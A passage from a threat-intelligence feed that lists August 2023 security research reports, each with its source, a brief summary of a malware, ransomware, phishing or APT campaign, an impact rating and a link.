Summary:: Last couple months, Trustwave SpiderLabs analysts have noticed a spikein threat actors employing PDF documents to gain initial access through email-borne attacks. Though the use of PDF files as a malicious vector is not a novel approach, it has become more popular as threat actors continue to experiment with techniques to bypass conventional security controls.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/threat-loaded-malicious-pdfs-never-go-out-of-style/

Intel Source:: Cybergeeks

Intel Name:: A_detailed_analyses_of_Brute_Ratel_C4_payloads

Date of Scan:: 2023-09-01

Impact:: LOW

Summary:: Cyber Geeks did deep analyses of Brute Ratel C4 payloads. Brute Ratel C4 is a Red Team & Adversary simulation software that can be considered an alternative to Cobalt Strike.

Source: https://cybergeeks.tech/a-deep-dive-into-brute-ratel-c4-payloads/

Intel Source:: Rapid7

Intel Name:: The_increased_threat_activity_against_Cisco_ASA_SSL_VPN_appliances

Date of Scan:: 2023-08-31

Impact:: MEDIUM

Summary:: Rapid7’s managed detection and response team have discovered increased threat activity targeting Cisco ASA SSL VPN appliances (physical and virtual). In some cases, adversaries have created credential stuffing attacks that leveraged weak or default passwords; in others, the activity was observed appears to be the result of targeted brute-force attacks on ASA appliances where multi-factor authentication (MFA) was either not enabled or was not enforced for all users (i.e., via MFA bypass groups).

Source: https://www.rapid7.com/blog/post/2023/08/29/under-siege-rapid7-observed-exploitation-of-cisco-asa-ssl-vpns/

Intel Source:: Fortinet

Intel Name:: The_attacks_on_Adobe_ColdFusion

Date of Scan:: 2023-08-31

Impact:: LOW

Summary:: Last month, Adobe took some counter measurementsto the exploitation of targeting pre-authentication remote code execution (RCE) vulnerabilities in their ColdFusion solution. FortiGuard Labs IPS telemetry data again detected numerous efforts to exploit the Adobe ColdFusion deserialization of untrusted data vulnerability, which creates a huge risk of arbitrary code execution. These attacks include probing, establishing reverse shells, and deploying malware for subsequent actions. Fortinet nalysts shared their detailed analysis of how this threat group exploits the Adobe ColdFusion vulnerability.

Source: https://www.fortinet.com/blog/threat-research/multiple-threats-target-adobe-coldfusion-vulnerabilities

Intel Source:: Sentilone

Intel Name:: A_new_wave_of_Good_Day_ransomware_attacks

Date of Scan:: 2023-08-31

Impact:: LOW

Summary:: Sentilone reserachers shared in their blog several unique Good Day ransom notes and victim portals and shared their analysis of a sample associated with a URL leading to a known Cloak extortion site. Good Day ransomware, a variant within the ARCrypter family. This new wave of Good Day attacks feature individual TOR-based victim portals for each target.

Source: https://www.sentinelone.com/blog/threat-actor-interplay-good-days-victim-portals-and-their-ties-to-cloak/

Intel Source:: Walmart Global Tech Blog

Intel Name:: DGA_analysis_and_the_Gazavat_DMSniff_link

Date of Scan:: 2023-08-31

Impact:: LOW

Summary:: Gazavat, a multi-functional backdoor that shares code with the POS malware DMSniff, is also known as Expiro, at least in part. It has been grouped alongside a few other malware versions throughout the years under the name Expiro, a file infector, by AV companies. This is a result of various malware families using the Carberp malware leak's leaked code.

Source: https://medium.com/walmartglobaltech/gazavat-expiro-dmsniff-connection-and-dga-analysis-8b965cc0221d

Intel Source:: ASEC

Intel Name:: Examining_Andariel_Recent_Attacking_Activities

Date of Scan:: 2023-08-31

Impact:: LOW

Summary:: Attacks thought to have been carried out by the Andariel group have been found by ASEC researchers. It is known that the Lazarus threat group or one of its affiliates is associated with the Andariel threat group, which typically targets Korean businesses and organizations. Since 2008, attacks on targets in Korea have been noted.

Source: https://asec.ahnlab.com/en/56405/

Intel Source:: Secureworks

Intel Name:: The_actions_against_the_Qakbot_botnet

Date of Scan:: 2023-08-30

Impact:: MEDIUM

Summary:: On August 29, 2023, U.S. law enforcement started a national operation for a that disruptionof the Qakbot botnet (also known as Qbot) and associated infrastructure. Secureworks Counter Threat Unit researchers have observed and monitored for a long time this botnet and detected the disruption activity on August 25. The initial access vector for these intrusions was a phishing email. Qakbot was one of the top malware threats, used by cybercriminals to deliver other malware such as Conti, ProLock, Egregor, REvil, MegaCortex, and Black Basta. The botnet was lucrative for the GOLD LAGOON threat group, which has operated the Qakbot malware since 2007. The threat actors reportedly received approximately $58 million in ransom payments between October 2021 and April 2023.

Source: https://www.secureworks.com/blog/qakbot-campaign-delivered-black-basta-ransomware

Intel Source:: Aquasec

Intel Name:: The_exploition_of_Kinsing_Malware

Date of Scan:: 2023-08-30

Impact:: LOW

Summary:: Aqua Nautilus observed a new malware campaign that exploits the Openfire vulnerability (CVE-2023-32315) which deploys Kinsing malware and a cryptominer. This vulnerability leads to a path traversal attack, which grants an unauthenticated user access to the Openfire setup environment. This then allows the threat actor to create a new admin user and upload malicious plugins. Eventually the attacker can gain full control over the server.

Source: https://blog.aquasec.com/kinsing-malware-exploits-novel-openfire-vulnerability

Intel Source:: Trustwave

Intel Name:: The_Rise_of_QR_Codes_in_Phishing

Date of Scan:: 2023-08-30

Impact:: LOW

Summary:: Threat actors are taking image phishing to the advance level by taking advantage of QR codes, a.k.a. ‘Qishing’, to hide their malicious URLs. The samples Tustwave analysts observed have been useing the technique are primarily disguised as Multifactor Authentication (MFA) notifications, which tricks their victims into scanning the QR code with their mobile phones to gain access. However, instead of going to the target’s desired location, the QR code leads them to the threat actor’s phishing page.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/think-before-you-scan-the-rise-of-qr-codes-in-phishing/

Intel Source:: TrendMicro

Intel Name:: Earth_Estries_Targeting_Government_and_Technology_Sector

Date of Scan:: 2023-08-30

Impact:: MEDIUM

Summary:: Researchers from TrendMicro have uncovered a fresh cyberespionage operation by the Earth Estries hacker collective. As Earth Estries targets governments and enterprises in the technology sector, they found parallels with the advanced persistent threat (APT) group FamousSparrow after analyzing the deployed tactics, methods, and procedures (TTPs).

Source: https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html

Intel Source:: McAfee

Intel Name:: RemcosRat_Malware_Peeled_Back

Date of Scan:: 2023-08-30

Impact:: LOW

Summary:: Researchers from McAfee have discovered a Remcos RAT operation that uses phishing emails to distribute malicious VBS scripts. A ZIP/RAR attachment was included in a phishing email. There is a highly obscured VBS file inside of this ZIP.

Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/peeling-back-the-layers-of-remcosrat-malware/

Intel Source:: Telekom Security

Intel Name:: DarkGate_Malware_Activity_Spikes

Date of Scan:: 2023-08-29

Impact:: LOW

Summary:: Telekom security researchers have identified that a new malspam campaign was observed deploying an off-the-shelf malware called DarkGate. The current spike in DarkGate malware activity is plausible given the fact that the developer of the malware has recently started to rent out the malware to a limited number of affiliates.

Source: https://github.security.telekom.com/2023/08/darkgate-loader.html

Intel Source:: Sophos

Intel Name:: Hackers_Targeting_Unpatched_Citrix_and_NetScaler_Systems

Date of Scan:: 2023-08-29

Impact:: LOW

Summary:: A campaign by threat actors to target unpatched Citrix and NetScaler systems that are online is being monitored by Sophos X-Ops at the moment. The data shows a considerable similarity between CVE-2023-3519-based attacks that deliver malware and webshells and earlier attempts that used a lot of the same TTPs. IOC link: https://github.com/sophoslabs/IoCs/blob/master/2023-08-25%20Citrix%20CVE-2023-3519%20attacks.csv

Source: https://infosec.exchange/@SophosXOps/110951651051968204

Intel Source:: JPCERT

Intel Name:: Embedding_a_malicious_Word_file_into_a_PDF_file

Date of Scan:: 2023-08-29

Impact:: LOW

Summary:: JPCERT/CC has discovered a new technique was used in a July attack, which bypassed detection by embedding a malicious Word file into a PDF file. They described in their blog the technique “MalDoc in PDF” and explained the details of and countermeasures against it.

Source: https://blogs.jpcert.or.jp/en/2023/08/maldocinpdf.html

Intel Source:: Security Affairs

Intel Name:: Target_on_Citrix_NetScaler_systems_in_massive_attacks

Date of Scan:: 2023-08-29

Impact:: MEDIUM

Summary:: Sophos X-Ops has tracked an ongoing campaign, which is targeting Citrix NetScaler systems, conducted by threat actors linked to the FIN8 group. The hackers are exploiting the remote code execution, tracked as CVE-2023-3519, in a large-scale campaign. The flaw CVE-2023-3519 (CVSS score: 9.8) is a code injection that could result in unauthenticated remote code execution.

Source: https://securityaffairs.com/150028/hacking/fin8-citrix-netscaler.html?amp=1

Intel Source:: Phylum

Intel Name:: NPM_Package_Masquerading

Date of Scan:: 2023-08-29

Impact:: LOW

Summary:: On August 24th 2023,, Phylum's detection system observed a suspicious package published to npm called “emails-helper." After investigating it, it was determined that this package was part of an sophisticated attack involving Base64-encoded and encrypted binaries. The scheme delivers encryption keys from a DNS TXT record hosted on a remote server. Additionally, a hex-encoded URL is retrieved from this remote server and then passed to the spawned binaries. The outcome of it is the deployment of powerful penetration testing tools such as dnscat2, mettle, and Cobalt Strike Beacon.

Source: https://blog.phylum.io/npm-emails-validator-package-malware/

Intel Source:: DFIR Report

Intel Name:: Widespread_Ransomware_is_Caused_by_HTML_Smuggling

Date of Scan:: 2023-08-28

Impact:: LOW

Summary:: Researchers from the DFIR report have noted that the threat actor behind the Nokoyawa Ransomware only deployed the final ransomware 12 hours after the initial intrusion. In November 2022, this threat actor used HTML smuggling to send businesses a password-protected ZIP file. An ISO file that distributed IcedID, which then used Cobalt Strike and finally Nokoyawa ransomware, was contained in the password-protected ZIP file.

Source: https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/

Intel Source:: Ironnet

Intel Name:: An_increase_in_MacOS_malware_detections

Date of Scan:: 2023-08-28

Impact:: LOW

Summary:: IronNet has observed an increase in MacOS malware within IronDome’s Education sector over the past couple of weeks. Their analysts investigated into these incidents found these infections were originating from already-infected personal devices that were brought into education networks, with the majority of these occurring at higher education institutions.

Source: https://www.ironnet.com/blog/back-to-school-reminder-keep-your-macs-clean

Intel Source:: Netenrich

Intel Name:: In_Depth_Analysis_of_ADHUBLLKA_Ransomware_Family

Date of Scan:: 2023-08-28

Impact:: LOW

Summary:: Researchers at Netenrich examined the Adhubllka ransomware, which is targeting regular people and small businesses with ransoms ranging from $800 to $1,600 since at least January 2020.

Source: https://netenrich.com/blog/discovering-the-adhubllka-ransomware-family

Intel Source:: ASEC

Intel Name:: Case_Studies_of_MS_SQL_Server_Proxyjacking

Date of Scan:: 2023-08-28

Impact:: MEDIUM

Summary:: Poorly managed MS-SQL servers have been the subject of proxyjacking attacks, according to ASEC experts. One of the primary attack methods for Windows systems is to employ publicly accessible MS-SQL servers with easy-to-guess passwords. Threat actors frequently attempt to obtain access to poorly maintained MS-SQL servers via brute force or dictionary assaults. If successful, they infect the system with malware.

Source: https://asec.ahnlab.com/en/56350/

Intel Source:: CERT-UA

Intel Name:: Emails_Containing_BAT_Files_in_BZIP_GZIP_and_RAR_Archives

Date of Scan:: 2023-08-28

Impact:: MEDIUM

Summary:: The distribution of emails with attachments in the form of BZIP, GZIP, and RAR archives containing BAT files made with the aid of the ScrubCrypt cryptor (price - from USD 249), the launch of which will guarantee that the computer is affected by the malicious program AsyncRAT, has been observed by CERT-UA researchers.

Source: https://cert.gov.ua/article/5628441

Intel Source:: Juniper

Intel Name:: DreamBus_Botnet_comes_back

Date of Scan:: 2023-08-28

Impact:: LOW

Summary:: Juniper Threat Labs reserachers has observed multiple attacks where threat actors used a vulnerability affecting RocketMQ servers (CVE-2023-33246) to infiltrate systems and install the malicious DreamBus bot, a malware strain last seen in 2021. This vulnerability opened the door for hackers to exploit the RocketMQ platform, leading to a series of attacks. Juniper analysts shared the details in their blog of the attacks and the bot.

Source: https://blogs.juniper.net/en-us/threat-research/dreambus-botnet-resurfaces-targets-rocketmq-vulnerability

Intel Source:: Akamai

Intel Name:: IoT_Targeting_Malware_Expands_Threat_Landscape

Date of Scan:: 2023-08-28

Impact:: LOW

Summary:: The Akamai Security Intelligence Response Team (SIRT) has identified a concerning evolution in the KmsdBot malware campaign. The newly discovered Kmsdx binary marks a significant update, now focusing on targeting Internet of Things (IoT) devices. This version of the malware incorporates telnet scanning capabilities and supports a wider range of CPU architectures, expanding its attack potential. The update underscores the ongoing threat posed by vulnerable IoT devices and reinforces the critical need for continuous security measures and updates. KmsdBot's scope encompasses private gaming servers, cloud hosting providers, and specific government and educational sites, suggesting a persistent concern for IoT security in a rapidly evolving threat landscape.

Source: https://www.akamai.com/blog/security-research/updated-kmsdbot-binary-targeting-iot

Intel Source:: Trellix

Intel Name:: Recent_activity_of_Scattered_Spider_threat_group

Date of Scan:: 2023-08-26

Impact:: MEDIUM

Summary:: Trellix researchers in their blog describe the details of the modus operandi of Scattered Spider; their recent events and tools leveraged by tthem, vulnerabilities exploited, and their impact. It also indicates that this group has started targeting other sectors, including critical infrastructure organizations. Scattered Spider is known for theft of sensitive data and leveraging trusted organizational infrastructure for follow-on attacks on downstream customers.

Source: https://www.trellix.com/en-us/about/newsroom/stories/research/scattered-spider-the-modus-operandi.html

Intel Source:: Cyfirma

Intel Name:: The_Constant_Threat_Posed_by_Remcos_RAT

Date of Scan:: 2023-08-25

Impact:: LOW

Summary:: Researchers from Cyfirma have examined an ongoing operation run by the Remcos Remote Access Trojan (RAT). The analysis reveals a highly developed threat ecosystem that makes use of a number of strategies, including malicious IP addresses, covert payloads, and complex functions that infect systems and acquire sensitive data.

Source: https://www.cyfirma.com/outofband/the-persistent-danger-of-remcos-rat/

Intel Source:: Microsoft

Intel Name:: A_Chinese_threat_actor_group_Flax_Typhoon_access_Taiwanese_organizations

Date of Scan:: 2023-08-25

Impact:: LOW

Summary:: Microsoft has detected a pattern of malicious activity affecting organizations in Taiwan using techniques that could be easily reused in other operations everywhere else. Microsoft assignes this campaign to Flax Typhoon (overlaps with ETHEREAL PANDA), a nation-state actor based out of China. Flax Typhoon’s observed behavior tells the threat actor intends to perform espionage and maintain access to organizations across a broad range of industries for as long as possible.

Source: https://www.microsoft.com/en-us/security/blog/2023/08/24/flax-typhoon-using-legitimate-software-to-quietly-access-taiwanese-organizations/

Intel Source:: Eclecticiq

Intel Name:: The_Investigation_of_RedLine_Stealer_Spam_Campaign

Date of Scan:: 2023-08-25

Impact:: LOW

Summary:: EclecticIQ researchers have gathered samples from a RedLine stealer spam campaign that ran between April and August 2023. The campaign was successful by distributing command and control among recently created domains hosted on IP addresses with reliable traffic, and Redline developers provide minor iterations to previous variants.

Source: https://blog.eclecticiq.com/redline-stealer-variants-demonstrate-a-low-barrier-to-entry-threat

Intel Source:: Talos

Intel Name:: Lazarus_Group_Exploits_ManageEngine_Flaw_to_Launch_QuiteRAT

Date of Scan:: 2023-08-25

Impact:: HIGH

Summary:: Researchers from Cisco Talos have identified the Lazarus Group as a state-sponsored actor operating against European and American healthcare organizations and internet backbone infrastructure. This is the third known effort that this actor is responsible for in less than a year, and they have all utilized the same infrastructure.

Source: https://blog.talosintelligence.com/lazarus-quiterat/

Intel Source:: Secureworks

Intel Name:: Smoke_Loader_Dropping_Geolocation_Malware_And_Flimsy_Recon_WiFi_Scanning_Software

Date of Scan:: 2023-08-25

Impact:: LOW

Summary:: Researchers from Secureworks have seen the Smoke Loader botnet deliver a specific Wi-Fi scanning program to compromised systems. This trojan was given the name Whiffy Recon. With the help of adjacent Wi-Fi access points as a source of information, it triangulates the coordinates of the infected PCs using Google's geolocation API.

Source: https://www.secureworks.com/blog/smoke-loader-drops-whiffy-recon-wi-fi-scanning-and-geolocation-malware

Intel Source:: Talos

Intel Name:: Lazarus_Group_new_threat_CollectionRAT

Date of Scan:: 2023-08-25

Impact:: HIGH

Summary:: Researchers from Cisco Talos have discovered another Lazarus Group's new threat called “CollectionRAT". CollectionRAT has standard remote access trojan (RAT) capabilities, including the ability to run arbitrary commands on an infected system. Cisco Talos analysts made analysis on it and came to the conclusion that CollectionRAT appears to be connected to Jupiter/EarlyRAT, another malware family Kaspersky recently wrote about and attributed to Andariel, a subgroup within the Lazarus Group umbrella of threat actors.

Source: https://blog.talosintelligence.com/lazarus-collectionrat/

Intel Source:: Any.Run

Intel Name:: Technical_Analysis_of_XWorm_Malware

Date of Scan:: 2023-08-24

Impact:: LOW

Summary:: AnyRun researchers have seen the latest version of an XWorm sample — a widespread malicious program that is advertised for sale on underground forums.

Source: https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/

Intel Source:: Malwarebytes

Intel Name:: Evolving_Malvertising_Tactics_advanced_Cloaking_Strategies

Date of Scan:: 2023-08-24

Impact:: LOW

Summary:: Malvertising campaigns are evolving with the adoption of advanced cloaking techniques that hinder detection and response. This article explores a recent malvertising chain that employs intricate fingerprinting, using encoded JavaScript, to assess visitor legitimacy. This escalating cyber battle underscores the challenges faced by defenders in countering these deceptive tactics

Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/08/malvertisers-up-the-game-against-researchers

Intel Source:: Safebreach

Intel Name:: New_Threat_Coverage_Akira_8Base_and_Rorschach

Date of Scan:: 2023-08-24

Impact:: MEDIUM

Summary:: Safebreach researchers have observed that the Hacker’s Playbook Threat Coverage round-up unveils added coverage for recently identified ransomware and malware variants, including Akira ransomware, 8Base ransomware, Rorschach (BabLock) ransomware, and others. SafeBreach customers can now simulate and assess their defenses against these evolving threats using the SafeBreach Hacker’s Playbook™.

Source: https://www.safebreach.com/resources/akira-ransomware-8base-threat-coverage/

Intel Source:: Zscaler

Intel Name:: New_Info_Stealer_Family_Named_Agniane

Date of Scan:: 2023-08-24

Impact:: LOW

Summary:: Agniane Stealer is a novel information stealer family discovered by Zscaler researchers. This malware takes credentials, system data, and session information from browsers, tokens, and file transfer tools. When Agniane Stealer acquires sensitive data, it passes it to command-and-control servers, where threat actors can act on the stolen information.

Source: https://www.zscaler.com/blogs/security-research/agniane-stealer-dark-webs-crypto-threat

Intel Source:: SOC Radar

Intel Name:: Raccoon_Stealer_Returns_with_New_Version

Date of Scan:: 2023-08-24

Impact:: LOW

Summary:: SOC Radar researchers have discovered that the creators of the data-stealing malware Raccoon Stealer have ended their six-month online silence. They are currently encouraging potential hackers to use the updated 2.3.0 malware (2.3.0.1 since August 15, 2023) version.

Source: https://socradar.io/raccoon-stealer-resurfaces-with-new-enhancements/

Intel Source:: Sentinelone

Intel Name:: Evolution_of_Ransomware_Linux_and_ESXi_Focused_Threats

Date of Scan:: 2023-08-24

Impact:: LOW

Summary:: SentinelOne researchers have observed that Ransomware tactics have evolved, with attackers now targeting Linux and VMWare ESXi platforms alongside Windows. This article explores recent ransomware families like MONTI Locker, Akira Ransomware, Trigona Linux Locker, and Abyss Locker. These threats exhibit cross-platform capabilities and strategic code reuse.

Source: https://www.sentinelone.com/blog/from-conti-to-akira-decoding-the-latest-linux-esxi-ransomware-families/

Intel Source:: ISC.SANS

Intel Name:: Dropping_AgentTesla_Exotic_Excel_Files

Date of Scan:: 2023-08-23

Impact:: LOW

Summary:: SANS researchers discovered that attackers prefer to employ more unusual extensions to boost their chances of escaping simple and foolish mail gateway regulations. This time, the extension ".xlam" was used.It discovered multiple emails that sent.xlam files to potential victims.

Source: https://isc.sans.edu/diary/More+Exotic+Excel+Files+Dropping+AgentTesla/30150/

Intel Source:: Trendmicro

Intel Name:: AI_Hype_Abused_in_Malicious_Facebook_Ads

Date of Scan:: 2023-08-23

Impact:: LOW

Summary:: Trendmicro researchers have identified Cybercriminals are capitalizing on the excitement surrounding Artificial Intelligence (AI) advancements through deceptive Facebook ads. These ads promise AI-powered advantages but instead distribute a malicious browser add-on that aims to steal victims' credentials. By exploiting AI enthusiasm, attackers are using URL shorteners and cloud storage to spread their harmful payload.

Source: https://www.trendmicro.com/en_us/research/23/h/profile-stealers-spread-via-llm-themed-facebook-ads.html

Intel Source:: Welivesecurity

Intel Name:: Spacecolon_Deploy_Scarab_Ransomware_on_Vulnerable_Servers

Date of Scan:: 2023-08-23

Impact:: LOW

Summary:: ESET researchers examined the Spacecolon, a modest toolset used to distribute Scarab ransomware versions to victims all around the world. It is most likely introduced into victim organisations by its operators exploiting insecure web servers or brute-forcing RDP credentials.

Source: https://www.welivesecurity.com/en/eset-research/scarabs-colon-izing-vulnerable-servers/

Intel Source:: Sentinelone

Intel Name:: New_Variant_of_XLoader_macOS_Malware

Date of Scan:: 2023-08-22

Impact:: LOW

Summary:: SentinelOne researchers have observed that a new variant of an Apple macOS malware called XLoader has surfaced in the wild, masquerading its malicious features under the guise of an office productivity app called OfficeNote.

Source: https://www.sentinelone.com/blog/xloaders-latest-trick-new-macos-variant-disguised-as-signed-officenote-app/

Intel Source:: Cyfirma

Intel Name:: CraxsRAT_and_CypherRAT_Created_by_EVLF_DEV

Date of Scan:: 2023-08-22

Impact:: LOW

Summary:: The CYFIRMA research team has identified a new Malware-as-a-Service (MaaS) operator known as EVLF DEV. This threat actor is responsible for the development of CypherRAT and CraxsRAT, which have been purchased on a lifetime licence by over 100 different threat actors in the previous three years.

Source: https://www.cyfirma.com/outofband/unmasking-evlf-dev-the-creator-of-cypherrat-and-craxsrat/

Intel Source:: Symantec

Intel Name:: Chinese_APT_Targeting_Hong_Kong_in_Supply_Chain_Attack

Date of Scan:: 2023-08-22

Impact:: LOW

Summary:: Symantec researchers have identified that an emerging China-backed advanced persistent threat group targeted organizations in Hong Kong in a supply chain attack that leveraged legitimate software to deploy the PlugX/Korplug backdoor.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/carderbee-software-supply-chain-certificate-abuse

Intel Source:: ASEC

Intel Name:: APT_Attack_Patterns_Targeting_Web_Services_of_Korean_Corporations

Date of Scan:: 2023-08-22

Impact:: MEDIUM

Summary:: ASEC reserachers has discovered the APT attacks on Korean corporate web servers. The attackers exploit vulnerabilities to infiltrate and execute malicious actions. The report covers attack techniques such as privilege escalation, credential theft, and remote control using tools like Mimikatz, Potato, and NetCat. The attackers' objectives appear to evolve from ad insertion to potentially deploying ransomware.

Source: https://asec.ahnlab.com/en/56236/

Intel Source:: Malwarebytes

Intel Name:: The_WoofLocker_Tech_Support_Campaign_is_Back

Date of Scan:: 2023-08-21

Impact:: LOW

Summary:: Malwarebytes researchers have discovered that the WoofLocker tech support scam scheme has returned. The tactics and procedures are fairly similar, but the infrastructure has been strengthened to withstand future takedown attempts.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/08/wooflocker2

Intel Source:: ISC.SANS

Intel Name:: System_BCMalware_Activity

Date of Scan:: 2023-08-21

Impact:: LOW

Summary:: Researchers from SANS have analyzed the captured request: /systembc/password.php. According to some references, this is likely the SystemBC Remote Access Trojan (RAT), all 4 IPs are part of the Digital Ocean ASN and only one has been reported as likely malicious.

Source: https://isc.sans.edu/diary/SystemBC+Malware+Activity/30138/

Intel Source:: QuickHeal

Intel Name:: Mallox_Ransomware_Targeting_Unprotected_Microsoft_SQL_Servers

Date of Scan:: 2023-08-18

Impact:: MEDIUM

Summary:: Researchers from QuickHeal have discovered that the Mallox (also known as TargetCompany) ransomware is presently using unprotected Microsoft SQL Servers as an attack vector to enter victims' systems and spread itself.

Source: https://blogs.quickheal.com/mallox-ransomware-strikes-unsecured-mssql-servers/

Intel Source:: eSentire

Intel Name:: StealC_Delivering_via_Deceptive_Google_Sheets

Date of Scan:: 2023-08-18

Impact:: MEDIUM

Summary:: Researchers at Esentire have discovered that a malicious advertisement that the user saw while trying to download Google Sheets was the infection's point of origin. This advertisement sent the visitor to a malicious website that contained a downloader for the malware StealC infostealer.

Source: https://www.esentire.com/blog/stealc-delivered-via-deceptive-google-sheets

Intel Source:: Lumen

Intel Name:: HiatusRAT_Returns_To_Action_After_A_Short_Break

Date of Scan:: 2023-08-18

Impact:: LOW

Summary:: Lumen researchers have continued to track threat actor resulting in new malware samples and infrastructure associated with the HiatusRAT cluster. In the latest campaign, they observed a shift in reconnaissance and targeting activity.

Source: https://blog.lumen.com/hiatusrat-takes-little-time-off-in-a-return-to-action/?utm_source=rss&utm_medium=rss&utm_campaign=hiatusrat-takes-little-time-off-in-a-return-to-action

Intel Source:: Blackberry

Intel Name:: New_Tool_Deployed_by_Cuba_Ransomware

Date of Scan:: 2023-08-18

Impact:: MEDIUM

Summary:: BlackBerry researchers have discovered and documented new tools used by the Cuba ransomware threat group. It is currently in the fourth year of its operation and shows no sign of slowing down. In the first half of 2023 alone, the operators behind Cuba ransomware were the perpetrators of several high-profile attacks across disparate industries.

Source: https://blogs.blackberry.com/en/2023/08/cuba-ransomware-deploys-new-tools-targets-critical-infrastructure-sector-in-the-usa-and-it-integrator-in-latin-america

Intel Source:: QuickHeal

Intel Name:: Diving_Deep_into_Darkrace_Ransomware

Date of Scan:: 2023-08-18

Impact:: LOW

Summary:: The incorporation of Lockbit's strategies into DarkRace demonstrates how cybercriminals are utilizing tried-and-true techniques to strengthen their attacks and increase damage. Combining these strategies could increase infections, compromise data, and escalate ransom demands.

Source: https://blogs.quickheal.com/darkrace-ransomware-a-deep-dive-into-its-techniques-and-impact/

Intel Source:: Fortinet

Intel Name:: NoCry_and_Trash_Panda_Ransomware

Date of Scan:: 2023-08-18

Impact:: LOW

Summary:: Researchers from Fortinet looked into Trash Panda and a fresh, tiny NoCry ransomware strain. Windows-based malware called Trash Panda was initially discovered in the first few days of August. On infected computers, it encrypts files, changes the desktop background, and drops a ransom note with political statements. The Windows platform ransomware known as NoCry was first identified in April 2021. The creators of the NoCry ransomware produce variations that are then offered for sale on the group's Telegram channel.

Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-trash-panda-and-nocry-variant

Intel Source:: ISC.SANS

Intel Name:: From_a_Zalando_Phishing_to_a_RAT

Date of Scan:: 2023-08-18

Impact:: LOW

Summary:: ISC.SANS researchers have seen a bunch of phishing emails targeting Zalando customers.

Source: https://isc.sans.edu/diary/From+a+Zalando+Phishing+to+a+RAT/30136/

Intel Source:: Sysdig

Intel Name:: Malicious_Campaign_Targeting_GitLab

Date of Scan:: 2023-08-17

Impact:: LOW

Summary:: The Sysdig Threat Research Team have discovered a new, financially motivated operation, dubbed LABRAT. This operation set itself apart from others due to the attacker’s emphasis on stealth and defense evasion in their attacks.

Source: https://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/

Intel Source:: Welivesecurity

Intel Name:: A_new_phishing_campaign_targeting_Zimbra_users

Date of Scan:: 2023-08-17

Impact:: LOW

Summary:: ESET researchers have uncovered a mass-spreading phishing campaign, aimed at collecting Zimbra account users’ credentials, active since at least April 2023 and still ongoing. Zimbra Collaboration is an open-core collaborative software platform, a popular alternative to enterprise email solutions. The campaign is mass-spreading; its targets are a variety of small and medium businesses and governmental entities. According to ESET telemetry, the greatest number of targets are located in Poland, followed by Ecuador and Italy. To date, we have not attributed this campaign to any known threat actors.

Source: https://www.welivesecurity.com/en/eset-research/mass-spreading-campaign-targeting-zimbra-users/

Intel Source:: IBM Security Intelligence

Intel Name:: Gozi_Malware_Launches_Another_Attack

Date of Scan:: 2023-08-17

Impact:: LOW

Summary:: Researchers at IBM Security Intelligence have noticed that the Gozi malware has returned and is now focusing on cryptocurrency platforms, banks, and other financial institutions.

Source: https://securityintelligence.com/posts/gozi-strikes-again-targeting-banks-cryptocurrency-and-more/

Intel Source:: Security Affairs

Intel Name:: Massive_phishing_campaign_targets_energy_sector

Date of Scan:: 2023-08-17

Impact:: MEDIUM

Summary:: Starting this May 2023, researchers from Cofense have observed a massive phishing campaign using QR codes in attacks to steal the Microsoft credentials of users from multiple industries. One of the organizations targeted by hackers is a notable energy company in the US.

Source: https://securityaffairs.com/149567/hacking/phishing-campaign-qr-codes.html?amp=1

Intel Source:: ASEC

Intel Name:: Hakuna_Matata_ransomware

Date of Scan:: 2023-08-16

Impact:: LOW

Summary:: Recently, ASEC reserachers has discovered the Hakuna Matata ransomware is used to attack Korean companies. Hakuna Matata is a recent ransomware and it was first time identified in July, 2023 on Twitter. Later this month, a post of a threat actor using Hakuna Matata on the dark web was shared on Twitter as well. Also to be mentined by researchers that the ransomware strains uploaded on VirusTotal, the file uploaded on July 2nd, 2023 is confirmed to be the first case.

Source: https://asec.ahnlab.com/en/56010/

Intel Source:: AT&T

Intel Name:: The_Shadow_Nexus_of_Malware_and_Proxy_Application

Date of Scan:: 2023-08-16

Impact:: MEDIUM

Summary:: Researchers from AT&T Alien Labs found a significant campaign of attacks distributing a proxy server application on Windows computers. Additionally, a proxy service provider was found, whose proxy requests are forwarded through hacked systems that have been turned into residential exit nodes by malware invasion.

Source: https://cybersecurity.att.com/blogs/labs-research/proxynation-the-dark-nexus-between-proxy-apps-and-malware

Intel Source:: Cyble

Intel Name:: Amadey_Bot_leveraged_by_LummaC_Stealer_to_Deploy_SectopRAT

Date of Scan:: 2023-08-16

Impact:: LOW

Summary:: Cyble reserachers has recently come across a novel approach for spreading SectopRAT. This technique entails delivering the SectopRAT payload by utilizing the Amadey bot malware, which is retrieved from the LummaC stealer.

Source: https://cyble.com/blog/lummac-stealer-leveraging-amadey-bot-to-deploy-sectoprat/

Intel Source:: Uptycs

Intel Name:: QwixxRAT_aka_Telegram_RAT

Date of Scan:: 2023-08-16

Impact:: LOW

Summary:: The Uptycs researchers discovered QwixxRAT (aka Telegram RAT) in early August 2023. The threat actor is widely distributing their malicious tool through Telegram and Discord platforms. Once installed on the victim’s Windows platform machines, the RAT stealthily collects sensitive data, which is then sent to the attacker's Telegram bot, providing them with unauthorized access to the victim's sensitive information.

Source: https://www.uptycs.com/blog/remote-access-trojan-qwixx-telegram

Intel Source:: Cyberint

Intel Name:: Raccoon_Stealer_Malware_Returns

Date of Scan:: 2023-08-16

Impact:: LOW

Summary:: Cyberint researchers have seen that the developers of Raccoon Stealer information-stealing malware have ended their 6-month hiatus from hacker forums to promote a new 2.3.0 version of the malware to cyber criminals. It is one of the most well-known and widely used information-stealing malware families, having been around since 2019, sold via a subscription model for $200/month to threat actors.

Source: https://cyberint.com/blog/financial-services/raccoon-stealer/

Intel Source:: Netscope

Intel Name:: Phishing_Campaign_Steals_Cloud_Credentials

Date of Scan:: 2023-08-16

Impact:: MEDIUM

